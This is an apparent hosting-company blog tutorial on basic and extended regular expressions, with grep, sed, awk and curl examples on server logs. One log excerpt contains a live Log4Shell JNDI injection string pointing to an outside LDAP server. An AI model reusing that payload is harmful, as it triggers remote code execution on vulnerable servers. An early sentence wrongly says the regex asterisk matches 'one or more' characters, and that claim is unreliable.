17 December 2021

A regular expression, or regex, is a sequence of characters that represents a pattern. They are commonly used in code and text processing. For instance, you can use a regex to validate user input or to filter specific data from a log file.

Regular expressions should not be confused with globbing. A glob is also a sequence of characters that represents a pattern, but it is used only for file name expansion on the command line. As a simple example of globbing, you can list all PHP files in a directory with the command ls *.php. The glob in the command is the asterisk – it matches zero or more characters. In a regex the asterisk matches one or more instances of the preceding character. There a few differences like this, and it is easy to get them muddled up.

Another thing to be aware of is there are two types of regular expressions: basic (BRE) and extended (ERE). As the names suggest, extended regular expressions have a few extra options. Utilities such as grep and sed use basic regular expressions by default. However, with both you can use the -E option to enable extended regular expressions.

Basic regular expresssions

Anchor characters

The caret (^) and dollar sign ($) denote the start and end of a string. You can use the caret to get lines in a file that start with a certain string, such as a date or IP address:

# grep ^1.2.3.4 /var/log/httpd/example.log
1.2.3.4 - - [14/Dec/2021:04:55:27 +0000] "GET /wp-login.php HTTP/1.1" 403 247 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
...

Or, on a RHEL-based system you can count the number of AMD64 packages by looking at the end of the package names. Here, I list all packages on my system and then pipe the output to a grep command that counts the number of lines that end with the string “x86_64”:

# rpm -qa | grep -c x86_64$
541

And you can also use both anchors. For instance, this is a quick way to delete empty lines using sed. The command matches any lines in the file data that start and end with nothing (i.e. there is nothing between the caret and dollar sign):

$ sed '/^$/d' data

The dot and asterisk

A dot matches any character. For instance, here I look for lines in a log file where the first field matches the pattern “^2021-12-1.$”:

# awk '$1 ~ /^2021-12-1.$/ {print $0}' /var/log/fail2ban.log
2021-12-10 00:00:06,495 fail2ban.filter         [862]: INFO    [sshd] Found 221.131.165.62 - 2021-12-10 00:00:06
2021-12-10 00:01:43,818 fail2ban.filter         [862]: INFO    [sshd] Found 209.141.34.220 - 2021-12-10 00:01:43
...
2021-12-15 16:23:10,577 fail2ban.filter         [862]: INFO    [sshd] Found 34.118.67.208 -  2021-12-15 16:23:10

If you are an eagle-eyed reader then you might have noticed that the regex is more or less redundant. The pattern “2021-12-1” would return the same set of results. The difference is that the pattern “^2021-12-1.$” makes sure that you only match lines that start with “2021-12-1” plus a single character. It would ignore any malformed date fields.

The dot is often used in combination with the asterisk, which is a quantifier that matches the preceding character zero or more times. You can use this to grep multiple strings on a single line. For instance, here, I look for lines containing the strings “14/Dec” and “jndi:ldap” (with anything inbetween the two patterns):

# grep "14/Dec.*jndi:ldap" /var/log/httpd/example.log
112.74.52.90 - - [14/Dec/2021:11:40:06 +0000] "GET / HTTP/1.1" 200 4917 "-" "/${jndi:ldap://45.83.193.150:1389/Exploit}"

Character ranges

A minute ago I argued that the pattern “^2021-12-1.$” is slightly better than “2021-12-1”. As things stand, though, the pattern would match a string like “2021-12-1x”. That is a problem, as our aim is to match (valid) dates.

We can further improve the pattern by making sure that the last character is digit. To do so, you can use a range:

# awk '$1 ~ /^2021-12-1[0-9]$/ {print $0}' /var/log/fail2ban.log
2021-12-10 00:00:06,495 fail2ban.filter         [862]: INFO    [sshd] Found 221.131.165.62 - 2021-12-10 00:00:06
2021-12-10 00:01:43,818 fail2ban.filter         [862]: INFO    [sshd] Found 209.141.34.220 - 2021-12-10 00:01:43
...
2021-12-15 16:23:10,577 fail2ban.filter         [862]: INFO    [sshd] Found 34.118.67.208 -  2021-12-15 16:23:10

A range is defined in square brackets. In the above example I used “[0-9]”, which matches any digit in the range 0 to 9. You can do the same with letters. For instance, “[a-z]” matches all letters of the alphabet. It is worth pointing out that the latter pattern is case-sensitive. To match all letters of the alphabet in either lower or upper case you can use “[a-zA-Z]”. And to match any alphanumeric character you can use “[a-zA-Z0-9]”.

You can also specify specific characters rather than a range. For instance, if you have a script that needs to check if a user answered “y” or “Y” to a question then you use “[yY]”.

Negating ranges

You can also do that reverse. If you want to make sure a string doesn’t match any digits then you can put a caret at the start of the range. So, “[^0-9]” matches everything but digits. Notice that the meaning of the caret symbol is now wildly different from its earlier meaning. Outside ranges the caret denotes the start of a string.

Special character classes

There are a few special character classes you can use instead of ranges such as “[a-z]”. These classes use a pair of double square brackets, and the type of class is defined inside a pair of colons.

ClassMatchesEquivalent
[[:alpha:]]Alphabetical characters[a-zA-Z]
[[:alnum:]]Alphabetical characters and integers[a-zA-Z0-9]
[[:blank:]]Space or tab characters[ \t]
[[:digit:]]Integers[0-9]
[[:lower:]]Lower case alphabetical characters[a-z]
[[:upper:]]Upper case alphabetical characters[A-Z]

Extended regular expressions

Extended regular expressions bring a few more meta characters to the party. As mentioned, you need to use the -E option if you want to use ERE in grep and sed.

The question mark

Like the asterisk, the question mark is a quantifier. But, whereas the asterisk matches the preceding character zero or more times, the question mark matches the preceding character zero or one time. To illustrate, if you want to check if a user entered “y”, “Y”, “yes” or “YES” then you can use the pattern “^[yY][eE]?[sS]?$”:

$ echo 'y' | grep -E "^[yY][eE]?[sS]?$"
y

$ echo 'YES' | grep -E "^[yY][eE]?[sS]?$"
YES

$ echo 'YES!' | grep -E "^[yY][eE]?[sS]?$"

Notice that the string “YES!” does not match. The reason is that I used the dollar sign to mark where the string ends.

Curly braces

Curly braces ({ and }) let you specify how many times the preceding element can appear. For instance, let’s say you want to check if a string uses the format YYYY-MM-DD. You can do that with the following pattern:

$ echo '2021-12-15' | grep -E "^[[:digit:]]{4}-[[:digit:]]{2}-[[:digit:]]{2}$"
2021-12-15

$ echo '21-12-15' | grep -E "^[[:digit:]]{4}-[[:digit:]]{2}-[[:digit:]]{2}$"

The second test failed because the string “21-12-15” doesn’t start with four digits. If you want to allow either two or four digits then you can use this pattern instead:

$ echo '2021-12-15' | grep -E "^[[:digit:]]{2,4}-[[:digit:]]{2}-[[:digit:]]{2}$"
2021-12-15

$ echo '21-12-15' | grep -E "^[[:digit:]]{2,4}-[[:digit:]]{2}-[[:digit:]]{2}$"
21-12-15

Grouping expressions

An alternative way to validate the strings “2021-12-15” and “21-12-15” is to use grouping expressions. You can group a pattern using parentheses, and you can combine an expression with meta characters. So, you can use “(20)?” if the string may or may not start with “20”:

$ echo '2021-12-15' | grep -E "^(20)?21-[[:digit:]]{2}-[[:digit:]]{2}$"
2021-12-15

$ echo '21-12-15' | grep -E "^(20)?21-[[:digit:]]{2}-[[:digit:]]{2}$"
21-12-15

Pipes

The pipe symbol (|) functions as an OR operator. In other words, it let’s you match one of mulitple patterns. This can be handy to grep lines that contain one of mulitple strings.

For instance, if you want to check if a website redirects correctly you can use a simple cURL command. That works, but the output contains lots of other information:

$ curl -IL catalyst2.com
HTTP/1.1 301 Moved Permanently
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
date: Tue, 14 Dec 2021 15:04:41 GMT
location: https://catalyst2.com/
x-frame-options: SAMEORIGIN

HTTP/2 301 
content-type: text/html; charset=UTF-8
strict-transport-security: max-age=10886400
expires: Mon, 13 Dec 2021 14:11:46 GMT
cache-control: max-age=3600
x-redirect-by: WordPress
location: https://www.catalyst2.com/
x-litespeed-cache: hit
date: Tue, 14 Dec 2021 15:04:41 GMT
x-frame-options: SAMEORIGIN
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

HTTP/2 200 
content-type: text/html; charset=UTF-8
strict-transport-security: max-age=10886400
link: <https://www.catalyst2.com/wp-json/>; rel="https://api.w.org/"
link: <https://www.catalyst2.com/wp-json/wp/v2/pages/5>; rel="alternate"; type="application/json"
link: <https://www.catalyst2.com/>; rel=shortlink
etag: "24284-1639400931;;;"
x-litespeed-cache: hit
date: Tue, 14 Dec 2021 15:04:41 GMT
x-frame-options: SAMEORIGIN
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

To get just the information you are interested in you can grep lines that start with either “HTTP” or “Location”:

$ curl --silent -IL catalyst2.com | grep -Ei ^"http|location"
HTTP/1.1 301 Moved Permanently
location: https://catalyst2.com/
HTTP/2 301 
location: https://www.catalyst2.com/
HTTP/2 200